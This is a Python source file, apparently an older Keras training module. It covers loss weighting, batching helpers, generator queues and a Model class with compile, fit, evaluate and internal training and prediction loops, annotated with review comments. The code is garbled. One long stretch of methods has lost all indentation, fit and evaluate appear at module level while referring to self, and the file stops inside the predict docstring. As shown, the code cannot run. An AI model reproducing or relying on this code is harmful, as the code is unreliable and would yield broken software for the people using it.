    if isinstance(metrics, dict):
        nested_metrics = []
        for name in output_names:
            output_metrics = metrics.get(name, [])
            if not isinstance(output_metrics, list):
                output_metrics = [output_metrics]
            nested_metrics.append(output_metrics)
        return nested_metrics
    raise Exception('Type of `metrics` argument not understood. '
                    'Expected a list or dictionary, found: ' +
                    str(metrics))
def collect_trainable_weights(layer):
    '''Collect every `trainable_weights` entry under `layer`,
    skipping any sublayer whose `trainable` attribute is `False`.
    '''
    if not getattr(layer, 'trainable', True):
        return []
    # container types expose their children under different attributes
    kind = layer.__class__.__name__
    if kind == 'Sequential':
        children = layer.flattened_layers
    elif kind == 'Model':
        children = layer.layers
    elif kind == 'Graph':
        children = layer._graph_nodes.values()
    else:
        children = None
    if children is None:
        weights = list(layer.trainable_weights)
    else:
        weights = []
        for child in children:
            weights += collect_trainable_weights(child)
    # dedupe, then order deterministically by variable name
    weights = list(set(weights))
    weights.sort(key=lambda w: w.name)
    return weights
def batch_shuffle(index_array, batch_size):
    '''Shuffle an index array batch-wise rather than element-wise.
    Useful for shuffling HDF5 arrays
    (where one cannot access arbitrary indices).
    '''
    batch_count = int(len(index_array) / batch_size)
    # items beyond the last full batch are held out and re-appended,
    # since reshape needs a cleanly divisible length
    trailing = index_array[batch_count * batch_size:]
    head = index_array[:batch_count * batch_size]
    grid = head.reshape((batch_count, batch_size))
    np.random.shuffle(grid)
    return np.append(grid.flatten(), trailing)
def make_batches(size, batch_size):
    '''Return a list of (start, end) index tuples covering `size` samples.
    '''
    nb_batch = int(np.ceil(size / float(batch_size)))
    batches = []
    for idx in range(nb_batch):
        start = idx * batch_size
        batches.append((start, min(size, start + batch_size)))
    return batches
def slice_X(X, start=None, stop=None):
    '''Slice an array-like, or each element of a list of array-likes.

    Outputs:
    - X[start:stop] if X is an array-like
    - [x[start:stop] for x in X] if X is a list

    Can also work on a list/array of indices: `slice_X(x, indices)`.

    # Arguments
        X: array-like, or list of array-likes.
        start: integer start index, or a list/array of indices.
        stop: integer stop index; should be None if `start` was a list.

    # Returns
        The sliced array, or list of sliced arrays.
    '''
    if isinstance(X, list):
        if hasattr(start, '__len__'):
            # hdf5 datasets only support list objects as indices
            if hasattr(start, 'shape'):
                start = start.tolist()
            return [x[start] for x in X]
        return [x[start:stop] for x in X]
    if hasattr(start, '__len__'):
        if hasattr(start, 'shape'):
            start = start.tolist()
        return X[start]
    return X[start:stop]
def weighted_objective(fn):
    '''Wrap an objective `fn(y_true, y_pred)` so it also accepts
    per-sample weights and an optional mask:
    `fn(y_true, y_pred, weights, mask)`.
    '''
    def weighted(y_true, y_pred, weights, mask=None):
        # raw per-element score; has ndim >= 2
        score = fn(y_true, y_pred)
        if mask is not None:
            # cast the mask to floatX to avoid float64 upcasting in theano
            mask = K.cast(mask, K.floatx())
            # zero out masked entries (mask matches score's shape) ...
            score *= mask
            # ... then rescale so the batch loss stays proportional
            # to the number of unmasked samples
            score /= K.mean(mask)
        # collapse trailing axes so score's ndim matches the weights'
        ndim = K.ndim(score)
        weight_ndim = K.ndim(weights)
        score = K.mean(score, axis=list(range(weight_ndim, ndim)))
        if weights is not None:
            # weight each sample, then renormalize by the fraction
            # of non-zero weights
            score *= weights
            score /= K.mean(K.cast(K.not_equal(weights, 0), K.floatx()))
        return K.mean(score)
    return weighted
def standardize_weights(y, sample_weight=None, class_weight=None,
                        sample_weight_mode=None):
    '''Performs weight input validation and standardization
    to a single sample-wise (or timestep-wise) weight array.

    # Arguments
        y: target Numpy array.
        sample_weight: optional 1D (sample-wise) or 2D (temporal)
            Numpy array of weights; takes priority over `class_weight`.
        class_weight: optional dict mapping class index -> weight.
        sample_weight_mode: None (sample-wise) or 'temporal'.

    # Returns
        Numpy weight array (ones when no weighting was requested).

    # Raises
        Exception: on inconsistent mode/shape combinations.
    '''
    if sample_weight_mode is not None:
        if sample_weight_mode != 'temporal':
            # fixed unbalanced quoting in the original message
            raise Exception('"sample_weight_mode" '
                            'should be None or "temporal". '
                            'Found: ' + str(sample_weight_mode))
        if len(y.shape) < 3:
            raise Exception('Found a sample_weight array for '
                            'an input with shape ' +
                            str(y.shape) + '. '
                            'Timestep-wise sample weighting (use of '
                            'sample_weight_mode="temporal") is restricted to '
                            'outputs that are at least 3D, i.e. that have '
                            'a time dimension.')
        if sample_weight is not None and len(sample_weight.shape) != 2:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + '. '
                            'In order to use timestep-wise sample weighting, '
                            'you should pass a 2D sample_weight array.')
    else:
        if sample_weight is not None and len(sample_weight.shape) != 1:
            raise Exception('Found a sample_weight array with shape ' +
                            str(sample_weight.shape) + '. '
                            'In order to use timestep-wise sample weights, '
                            'you should specify sample_weight_mode="temporal" '
                            'in compile(). If you just mean to use '
                            'sample-wise weights, make sure your '
                            'sample_weight array is 1D.')
    if sample_weight is not None:
        # explicit weights win over class_weight
        assert len(sample_weight.shape) <= len(y.shape)
        # TODO: proper error message
        assert y.shape[:sample_weight.ndim] == sample_weight.shape
        return sample_weight
    elif isinstance(class_weight, dict):
        if len(y.shape) > 2:
            raise Exception('class_weight not supported for '
                            '3+ dimensional targets.')
        if y.shape[1] > 1:
            # one-hot targets: recover the class index per sample
            y_classes = y.argmax(axis=1)
        elif y.shape[1] == 1:
            y_classes = np.reshape(y, y.shape[0])
        else:
            y_classes = y
        # NOTE(review): classes absent from `class_weight` raise KeyError
        weights = np.asarray([class_weight[cls] for cls in y_classes])
        return weights
    else:
        # no weighting requested: return uniform weights
        if sample_weight_mode is None:
            return np.ones((y.shape[0],), dtype=K.floatx())
        else:
            return np.ones((y.shape[0], y.shape[1]), dtype=K.floatx())
def generator_queue(generator, max_q_size=10,
                    wait_time=0.05, nb_worker=1, pickle_safe=False):
    '''Builds a queue out of a data generator.
    If pickle_safe, use a multiprocessing approach. Else, use threading.
    Used in `fit_generator`, `evaluate_generator`, `predict_generator`.

    # Arguments
        generator: the data generator to consume from.
        max_q_size: soft cap on queued items (in threading mode it is
            enforced manually via qsize() before each put).
        wait_time: seconds to sleep when the queue is considered full.
        nb_worker: number of consumer threads/processes to start.
        pickle_safe: use processes instead of threads; the generator
            and its output must then be picklable.

    # Returns
        Tuple (queue, stop_event); setting the event asks workers to exit.
    '''
    generator_threads = []
    if pickle_safe:
        q = multiprocessing.Queue(maxsize=max_q_size)
        _stop = multiprocessing.Event()
    else:
        # NOTE(review): no maxsize here; the bound is checked manually
        # below via q.qsize(), which is only approximate under concurrency.
        q = queue.Queue()
        _stop = threading.Event()
    try:
        def data_generator_task():
            # each worker pulls items from the shared generator until stopped
            while not _stop.is_set():
                try:
                    if pickle_safe or q.qsize() < max_q_size:
                        generator_output = next(generator)
                        q.put(generator_output)
                    else:
                        time.sleep(wait_time)
                except Exception:
                    # any generator failure stops all workers; the raise
                    # surfaces the traceback inside the worker
                    _stop.set()
                    raise
        # NOTE(review): with nb_worker > 1 (threading mode) the same
        # generator is advanced concurrently — confirm it is thread-safe.
        for i in range(nb_worker):
            if pickle_safe:
                # Reset random seed else all children processes share the same seed
                np.random.seed()
                thread = multiprocessing.Process(target=data_generator_task)
            else:
                thread = threading.Thread(target=data_generator_task)
            generator_threads.append(thread)
            thread.daemon = True
            thread.start()
    except:
        _stop.set()
        if pickle_safe:
            # Terminate all daemon processes
            for p in generator_threads:
                if p.is_alive():
                    p.terminate()
            q.close()
        raise
    return q, _stop
class Model(Container):
    def compile(self, optimizer, loss, metrics=[], loss_weights=None,
                sample_weight_mode=None, **kwargs):
        '''Configures the model for training.
        # Arguments
            optimizer: str (name of optimizer) or optimizer object.
                See [optimizers](/optimizers).
            loss: str (name of objective function) or objective function.
                See [objectives](/objectives).
                If the model has multiple outputs, you can use a different loss
                on each output by passing a dictionary or a list of objectives.
            metrics: list of metrics to be evaluated by the model
                during training and testing.
                Typically you will use `metrics=['accuracy']`.
                To specify different metrics for different outputs of a
                multi-output model, you could also pass a dictionary,
                such as `metrics={'output_a': 'accuracy'}`.
            sample_weight_mode: if you need to do timestep-wise
                sample weighting (2D weights), set this to "temporal".
                "None" defaults to sample-wise weights (1D).
                If the model has multiple outputs, you can use a different
                `sample_weight_mode` on each output by passing a
                dictionary or a list of modes.
            kwargs: when using the Theano backend, these arguments
                are passed into K.function. Ignored for Tensorflow backend.
        '''
        # NOTE(review): `metrics=[]` is a mutable default; it is only read
        # here (never mutated in place), so it is safe but unidiomatic.
        self.optimizer = optimizers.get(optimizer)
        self.sample_weight_mode = sample_weight_mode
        self.loss = loss
        self.loss_weights = loss_weights
        # prepare loss weights: normalize None/dict/list to one float per output
        if loss_weights is None:
            loss_weights_list = [1. for _ in range(len(self.outputs))]
        elif type(loss_weights) is dict:
            for name in loss_weights:
                if name not in self.output_names:
                    raise Exception('Unknown entry in loss_weights '
                                    'dictionary: "' + name + '". '
                                    'Only expected the following keys: ' +
                                    str(self.output_names))
            loss_weights_list = []
            for name in self.output_names:
                # outputs absent from the dict default to weight 1
                loss_weights_list.append(loss_weights.get(name, 1.))
        elif type(loss_weights) is list:
            if len(loss_weights) != len(self.outputs):
                raise Exception('When passing a list as loss_weights, '
                                'it should have one entry per model outputs. '
                                'The model has ' + str(len(self.outputs)) +
                                ' outputs, but you passed loss_weights=' +
                                str(loss_weights))
            loss_weights_list = loss_weights
        else:
            raise Exception('Could not interpret loss_weights argument: ' +
                            str(loss_weights))
        # prepare loss functions: normalize dict/list/single to one fn per output
        if type(loss) is dict:
            for name in loss:
                if name not in self.output_names:
                    raise Exception('Unknown entry in loss '
                                    'dictionary: "' + name + '". '
                                    'Only expected the following keys: ' +
                                    str(self.output_names))
            loss_functions = []
            for name in self.output_names:
                # unlike loss_weights, every output MUST have a loss
                if name not in loss:
                    raise Exception('Output "' + name +
                                    '" missing from loss dictionary')
                loss_functions.append(objectives.get(loss[name]))
        elif type(loss) is list:
            if len(loss) != len(self.outputs):
                raise Exception('When passing a list as loss, '
                                'it should have one entry per model outputs. '
                                'The model has ' + str(len(self.outputs)) +
                                ' outputs, but you passed loss=' +
                                str(loss))
            loss_functions = [objectives.get(l) for l in loss]
        else:
            # a single loss is shared by every output
            loss_function = objectives.get(loss)
            loss_functions = [loss_function for _ in range(len(self.outputs))]
        self.loss_functions = loss_functions
        # wrap each loss so it accepts (y_true, y_pred, weights, mask)
        weighted_losses = [weighted_objective(fn) for fn in loss_functions]
        # prepare output masks
        masks = self.compute_mask(self.inputs, mask=None)
        if masks is None:
            masks = [None for _ in self.outputs]
        if type(masks) is not list:
            masks = [masks]
        # prepare sample weights: build one weight placeholder per output,
        # 2D for 'temporal' mode and 1D otherwise
        if type(sample_weight_mode) is dict:
            for name in sample_weight_mode:
                if name not in self.output_names:
                    raise Exception('Unknown entry in '
                                    'sample_weight_mode dictionary: "' +
                                    name + '". '
                                    'Only expected the following keys: ' +
                                    str(self.output_names))
            sample_weights = []
            sample_weight_modes = []
            for name in self.output_names:
                if name not in sample_weight_mode:
                    raise Exception('Output "' + name +
                                    '" missing from sample_weight_modes '
                                    'dictionary')
                if sample_weight_mode.get(name) == 'temporal':
                    weight = K.placeholder(ndim=2, name=name + '_sample_weights')
                    sample_weight_modes.append('temporal')
                else:
                    weight = K.placeholder(ndim=1, name=name + '_sample_weights')
                    sample_weight_modes.append(None)
                sample_weights.append(weight)
        elif type(sample_weight_mode) is list:
            if len(sample_weight_mode) != len(self.outputs):
                raise Exception('When passing a list as sample_weight_mode, ' +
                                'it should have one entry per model outputs. '
                                'The model has ' + str(len(self.outputs)) +
                                ' outputs, but you passed sample_weight_mode=' +
                                str(sample_weight_mode))
            sample_weights = []
            sample_weight_modes = []
            for mode, name in zip(sample_weight_mode, self.output_names):
                if mode == 'temporal':
                    weight = K.placeholder(ndim=2, name=name + '_sample_weights')
                    sample_weight_modes.append('temporal')
                else:
                    weight = K.placeholder(ndim=1, name=name + '_sample_weights')
                    sample_weight_modes.append(None)
                sample_weights.append(weight)
        else:
            if sample_weight_mode == 'temporal':
                sample_weights = [K.placeholder(ndim=2, name=name + '_sample_weights')
                                  for name in self.output_names]
                sample_weight_modes = ['temporal' for name in self.output_names]
            else:
                sample_weights = [K.placeholder(ndim=1, name=name + '_sample_weights')
                                  for name in self.output_names]
                sample_weight_modes = [None for name in self.output_names]
        self.sample_weight_modes = sample_weight_modes
        # prepare targets of model: one placeholder per output, matching rank
        self.targets = []
        for i in range(len(self.outputs)):
            shape = self.internal_output_shapes[i]
            name = self.output_names[i]
            self.targets.append(K.placeholder(ndim=len(shape), name=name + '_target'))
        # prepare metrics
        self.metrics = metrics
        self.metrics_names = ['loss']
        self.metrics_tensors = []
        # compute total loss as the loss-weighted sum of per-output losses
        total_loss = None
        for i in range(len(self.outputs)):
            y_true = self.targets[i]
            y_pred = self.outputs[i]
            weighted_loss = weighted_losses[i]
            sample_weight = sample_weights[i]
            mask = masks[i]
            loss_weight = loss_weights_list[i]
            output_loss = weighted_loss(y_true, y_pred,
                                        sample_weight, mask)
            if len(self.outputs) > 1:
                # per-output losses are also reported as metrics
                self.metrics_tensors.append(output_loss)
                self.metrics_names.append(self.output_names[i] + '_loss')
            if total_loss is None:
                total_loss = loss_weight * output_loss
            else:
                total_loss += loss_weight * output_loss
        # add regularization penalties to the loss
        for r in self.regularizers:
            total_loss = r(total_loss)
        # list of same size as output_names.
        # contains tuples (metrics for output, names of metrics)
        nested_metrics = collect_metrics(metrics, self.output_names)
        for i in range(len(self.outputs)):
            y_true = self.targets[i]
            y_pred = self.outputs[i]
            output_metrics = nested_metrics[i]
            for metric in output_metrics:
                if metric == 'accuracy' or metric == 'acc':
                    # custom handling of accuracy (because of class mode duality)
                    output_shape = self.internal_output_shapes[i]
                    if output_shape[-1] == 1 or self.loss_functions[i] == objectives.binary_crossentropy:
                        # case: binary accuracy
                        self.metrics_tensors.append(metrics_module.binary_accuracy(y_true, y_pred))
                    elif self.loss_functions[i] == objectives.sparse_categorical_crossentropy:
                        # case: categorical accuracy with sparse targets
                        self.metrics_tensors.append(
                            metrics_module.sparse_categorical_accuracy(y_true, y_pred))
                    else:
                        # case: categorical accuracy with dense targets
                        self.metrics_tensors.append(metrics_module.categorical_accuracy(y_true, y_pred))
                    if len(self.output_names) == 1:
                        self.metrics_names.append('acc')
                    else:
                        self.metrics_names.append(self.output_layers[i].name + '_acc')
                else:
                    metric_fn = metrics_module.get(metric)
                    self.metrics_tensors.append(metric_fn(y_true, y_pred))
                    if len(self.output_names) == 1:
                        self.metrics_names.append(metric_fn.__name__)
                    else:
                        self.metrics_names.append(self.output_layers[i].name + '_' + metric_fn.__name__)
        # prepare gradient updates and state updates
        # NOTE(review): the optimizer was already resolved at the top of
        # compile(); this second get() re-resolves it — confirm intentional.
        self.optimizer = optimizers.get(optimizer)
        self.total_loss = total_loss
        self.sample_weights = sample_weights
        # functions for train, test and predict will
        # be compiled lazily when required.
        # This saves time when the user is not using all functions.
        self._function_kwargs = kwargs
        self.train_function = None
        self.test_function = None
        self.predict_function = None
        self._collected_trainable_weights = collect_trainable_weights(self)
def _make_train_function(self):
if not hasattr(self, 'train_function'):
raise Exception('You must compile your model before using it.')
if self.train_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
training_updates = self.optimizer.get_updates(self._collected_trainable_weights,
self.constraints,
self.total_loss)
updates = self.updates + training_updates
# returns loss and metrics. Updates weights at each call.
self.train_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=updates,
**self._function_kwargs)
def _make_test_function(self):
if not hasattr(self, 'test_function'):
raise Exception('You must compile your model before using it.')
if self.test_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + self.targets + self.sample_weights + [K.learning_phase()]
else:
inputs = self.inputs + self.targets + self.sample_weights
# return loss and metrics, no gradient updates.
# Does update the network states.
self.test_function = K.function(inputs,
[self.total_loss] + self.metrics_tensors,
updates=self.state_updates,
**self._function_kwargs)
def _make_predict_function(self):
if not hasattr(self, 'predict_function'):
self.predict_function = None
if self.predict_function is None:
if self.uses_learning_phase and type(K.learning_phase()) is not int:
inputs = self.inputs + [K.learning_phase()]
else:
inputs = self.inputs
# returns network outputs. Does not update weights.
# Does update the network states.
kwargs = getattr(self, '_function_kwargs', {})
self.predict_function = K.function(inputs,
self.outputs,
updates=self.state_updates,
**kwargs)
def _fit_loop(self, f, ins, out_labels=[], batch_size=32,
nb_epoch=100, verbose=1, callbacks=[],
val_f=None, val_ins=None, shuffle=True,
callback_metrics=[]):
'''Abstract fit function for f(ins).
Assume that f returns a list, labeled by out_labels.
# Arguments
f: Keras function returning a list of tensors
ins: list of tensors to be fed to `f`
out_labels: list of strings, display names of
the outputs of `f`
batch_size: integer batch size
nb_epoch: number of times to iterate over the data
verbose: verbosity mode, 0, 1 or 2
callbacks: list of callbacks to be called during training
val_f: Keras function to call for validation
val_ins: list of tensors to be fed to `val_f`
shuffle: whether to shuffle the data at the beginning of each epoch
callback_metrics: list of strings, the display names of the metrics
passed to the callbacks. They should be the
concatenation of list the display names of the outputs of
`f` and the list of display names of the outputs of `f_val`.
# Returns
`History` object.
'''
do_validation = False
if val_f and val_ins:
do_validation = True
if verbose:
print('Train on %d samples, validate on %d samples' %
(ins[0].shape[0], val_ins[0].shape[0]))
nb_train_sample = ins[0].shape[0]
index_array = np.arange(nb_train_sample)
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
# it's possible to callback a different model than self
# (used by Sequential models)
if hasattr(self, 'callback_model') and self.callback_model:
callback_model = self.callback_model
else:
callback_model = self
callbacks._set_model(callback_model)
callbacks._set_params({
'batch_size': batch_size,
'nb_epoch': nb_epoch,
'nb_sample': nb_train_sample,
'verbose': verbose,
'do_validation': do_validation,
'metrics': callback_metrics,
})
callbacks.on_train_begin()
callback_model.stop_training = False
self.validation_data = val_ins
for epoch in range(nb_epoch):
callbacks.on_epoch_begin(epoch)
if shuffle == 'batch':
index_array = batch_shuffle(index_array, batch_size)
elif shuffle:
np.random.shuffle(index_array)
batches = make_batches(nb_train_sample, batch_size)
epoch_logs = {}
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
try:
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
except TypeError:
raise Exception('TypeError while preparing batch. '
'If using HDF5 input data, '
'pass shuffle="batch".')
batch_logs = {}
batch_logs['batch'] = batch_index
batch_logs['size'] = len(batch_ids)
callbacks.on_batch_begin(batch_index, batch_logs)
outs = f(ins_batch)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
if batch_index == len(batches) - 1: # last batch
# validation
if do_validation:
# replace with self._evaluate
val_outs = self._test_loop(val_f, val_ins,
batch_size=batch_size,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
if callback_model.stop_training:
break
callbacks.on_train_end()
return self.history
def _predict_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Array of predictions (if the model has a single output)
or list of arrays of predictions
(if the model has multiple outputs).
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) != list:
batch_outs = [batch_outs]
if batch_index == 0:
for batch_out in batch_outs:
shape = (nb_sample,) + batch_out.shape[1:]
outs.append(np.zeros(shape, dtype=K.floatx()))
for i, batch_out in enumerate(batch_outs):
outs[i][batch_start:batch_end] = batch_out
if verbose == 1:
progbar.update(batch_end)
if len(outs) == 1:
return outs[0]
return outs
def _test_loop(self, f, ins, batch_size=32, verbose=0):
'''Abstract method to loop over some data in batches.
# Arguments
f: Keras function returning a list of tensors.
ins: list of tensors to be fed to `f`.
batch_size: integer batch size.
verbose: verbosity mode.
# Returns
Scalar loss (if the model has a single output and no metrics)
or list of scalars (if the model has multiple outputs
and/or metrics). The attribute `model.metrics_names` will give you
the display labels for the scalar outputs.
'''
nb_sample = ins[0].shape[0]
outs = []
if verbose == 1:
progbar = Progbar(target=nb_sample)
batches = make_batches(nb_sample, batch_size)
index_array = np.arange(nb_sample)
for batch_index, (batch_start, batch_end) in enumerate(batches):
batch_ids = index_array[batch_start:batch_end]
if type(ins[-1]) is float:
# do not slice the training phase flag
ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
else:
ins_batch = slice_X(ins, batch_ids)
batch_outs = f(ins_batch)
if type(batch_outs) == list:
if batch_index == 0:
for batch_out in enumerate(batch_outs):
outs.append(0.)
for i, batch_out in enumerate(batch_outs):
outs[i] += batch_out * len(batch_ids)
else:
if batch_index == 0:
outs.append(0.)
outs[0] += batch_outs * len(batch_ids)
if verbose == 1:
progbar.update(batch_end)
for i, out in enumerate(outs):
outs[i] /= nb_sample
if len(outs) == 1:
return outs[0]
return outs
    def _standardize_user_data(self, x, y,
                               sample_weight=None, class_weight=None,
                               check_batch_dim=True, batch_size=None):
        '''Validate and normalize user-provided x/y/weights before a run.

        Returns a tuple (x, y, sample_weights) of lists of Numpy arrays
        aligned with the model's inputs/outputs.

        # Raises
            Exception: if the model is not compiled, the data is
                inconsistent, or a stateful model gets a partial batch.
        '''
        if not hasattr(self, 'optimizer'):
            raise Exception('You must compile a model before training/testing.'
                            ' Use `model.compile(optimizer, loss)`.')
        # build the expected target shape per output, depending on the loss
        output_shapes = []
        for output_shape, loss_fn in zip(self.internal_output_shapes, self.loss_functions):
            if loss_fn.__name__ == 'sparse_categorical_crossentropy':
                # sparse targets carry class indices: last dim is 1
                output_shapes.append(output_shape[:-1] + (1,))
            elif getattr(objectives, loss_fn.__name__, None) is None:
                # custom (non-built-in) loss: skip target shape validation
                output_shapes.append(None)
            else:
                output_shapes.append(output_shape)
        # NOTE(review): the `check_batch_dim` parameter is accepted but
        # both calls below hard-code check_batch_dim=False — confirm intended.
        x = standardize_input_data(x, self.input_names,
                                   self.internal_input_shapes,
                                   check_batch_dim=False,
                                   exception_prefix='model input')
        y = standardize_input_data(y, self.output_names,
                                   output_shapes,
                                   check_batch_dim=False,
                                   exception_prefix='model target')
        sample_weights = standardize_sample_weights(sample_weight,
                                                    self.output_names)
        class_weights = standardize_class_weights(class_weight,
                                                  self.output_names)
        # merge sample/class weights into one weight array per output
        sample_weights = [standardize_weights(ref, sw, cw, mode)
                          for (ref, sw, cw, mode)
                          in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
        check_array_lengths(x, y, sample_weights)
        check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
        if self.stateful and batch_size:
            # stateful models require every batch to be full
            if x[0].shape[0] % batch_size != 0:
                raise Exception('In a stateful network, '
                                'you should only pass inputs with '
                                'a number of samples that can be '
                                'divided by the batch size. Found: ' +
                                str(x[0].shape[0]) + ' samples')
        return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=None,
        validation_split=0., validation_data=None, shuffle=True,
        class_weight=None, sample_weight=None):
    '''Trains the model for a fixed number of epochs (iterations on a dataset).

    # Arguments
        x: Numpy array of training data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        batch_size: integer. Number of samples per gradient update.
        nb_epoch: integer, the number of times to iterate over the training data arrays.
        verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
        callbacks: list of callbacks to be called during training.
            See [callbacks](/callbacks).
        validation_split: float between 0 and 1:
            fraction of the training data to be used as validation data.
            The model will set apart this fraction of the training data,
            will not train on it, and will evaluate the loss and any model metrics
            on this data at the end of each epoch.
        validation_data: data on which to evaluate the loss and any model metrics
            at the end of each epoch. The model will not be trained on this data.
            This could be a tuple (x_val, y_val) or a tuple (val_x, val_y, val_sample_weights).
        shuffle: boolean, whether to shuffle the training data before each epoch.
        class_weight: optional dictionary mapping class indices (integers) to
            a weight (float) to apply to the model's loss for the samples
            from this class during training.
            This can be useful to tell the model to "pay more attention" to
            samples from an under-represented class.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            In the case of temporal data, you can pass a 2D array
            with shape (samples, sequence_length),
            to apply a different weight to every timestep of every sample.
            In this case you should make sure to specify sample_weight_mode="temporal" in compile().

    # Returns
        A `History` instance. Its `history` attribute contains
        all information collected during training.
    '''
    # Fix: the default was a mutable `[]`, which is shared across calls and
    # would accumulate appended callbacks between fit() invocations.
    if callbacks is None:
        callbacks = []

    # validate user data
    x, y, sample_weights = self._standardize_user_data(x, y,
                                                       sample_weight=sample_weight,
                                                       class_weight=class_weight,
                                                       check_batch_dim=False,
                                                       batch_size=batch_size)
    # prepare validation data
    if validation_data:
        do_validation = True
        if len(validation_data) == 2:
            val_x, val_y = validation_data
            val_sample_weight = None
        elif len(validation_data) == 3:
            val_x, val_y, val_sample_weight = validation_data
        else:
            # Fix: was a bare `raise` with no active exception, which itself
            # raises RuntimeError; raise an informative exception instead.
            raise Exception('validation_data should be a tuple '
                            '(val_x, val_y, val_sample_weight) '
                            'or (val_x, val_y). Found: ' + str(validation_data))
        val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y,
                                                                       sample_weight=val_sample_weight,
                                                                       check_batch_dim=False,
                                                                       batch_size=batch_size)
        self._make_test_function()
        val_f = self.test_function
        # Append the learning-phase flag (0 = test mode) when the backend
        # uses a symbolic learning phase.
        if self.uses_learning_phase and type(K.learning_phase()) is not int:
            val_ins = val_x + val_y + val_sample_weights + [0.]
        else:
            val_ins = val_x + val_y + val_sample_weights

    elif validation_split and 0. < validation_split < 1.:
        # Carve the validation set off the end of the training arrays.
        do_validation = True
        split_at = int(len(x[0]) * (1. - validation_split))
        x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
        y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
        sample_weights, val_sample_weights = (
            slice_X(sample_weights, 0, split_at), slice_X(sample_weights, split_at))
        self._make_test_function()
        val_f = self.test_function
        if self.uses_learning_phase and type(K.learning_phase()) is not int:
            val_ins = val_x + val_y + val_sample_weights + [0.]
        else:
            val_ins = val_x + val_y + val_sample_weights
    else:
        do_validation = False
        val_f = None
        val_ins = None

    # prepare input arrays and training function (1. = train-mode learning phase)
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + y + sample_weights + [1.]
    else:
        ins = x + y + sample_weights
    self._make_train_function()
    f = self.train_function

    # prepare display labels
    out_labels = self.metrics_names

    # rename duplicated metrics name
    # (can happen with an output layer shared among multiple dataflows)
    deduped_out_labels = []
    for i, label in enumerate(out_labels):
        new_label = label
        if out_labels.count(label) > 1:
            dup_idx = out_labels[:i].count(label)
            new_label += '_' + str(dup_idx + 1)
        deduped_out_labels.append(new_label)
    out_labels = deduped_out_labels

    if do_validation:
        callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
    else:
        callback_metrics = copy.copy(out_labels)

    # delegate logic to _fit_loop
    return self._fit_loop(f, ins, out_labels=out_labels,
                          batch_size=batch_size, nb_epoch=nb_epoch,
                          verbose=verbose, callbacks=callbacks,
                          val_f=val_f, val_ins=val_ins, shuffle=shuffle,
                          callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
    '''Returns the loss value and metrics values for the model
    in test mode. Computation is done in batches.

    # Arguments
        x: Numpy array of test data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        batch_size: integer. Number of samples per gradient update.

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    # Normalize the user-provided arrays/dicts into flat lists.
    x, y, sample_weights = self._standardize_user_data(
        x, y,
        sample_weight=sample_weight,
        check_batch_dim=False,
        batch_size=batch_size)

    # Feed order: inputs, targets, sample weights, then the learning-phase
    # flag (0. = test mode) when the backend uses a symbolic learning phase.
    if self.uses_learning_phase and type(K.learning_phase()) is not int:
        ins = x + y + sample_weights + [0.]
    else:
        ins = x + y + sample_weights

    self._make_test_function()
    test_fn = self.test_function
    return self._test_loop(test_fn, ins,
                           batch_size=batch_size,
                           verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
    '''Generates output predictions for the input samples,
    processing the samples in a batched way.

    # Arguments
        x: the input data, as a Numpy array
            (or list of Numpy arrays if the model has multiple outputs).
        batch_size: integer.
        verbose: verbosity mode, 0 or 1.

    # Returns
        A Numpy array of predictions.
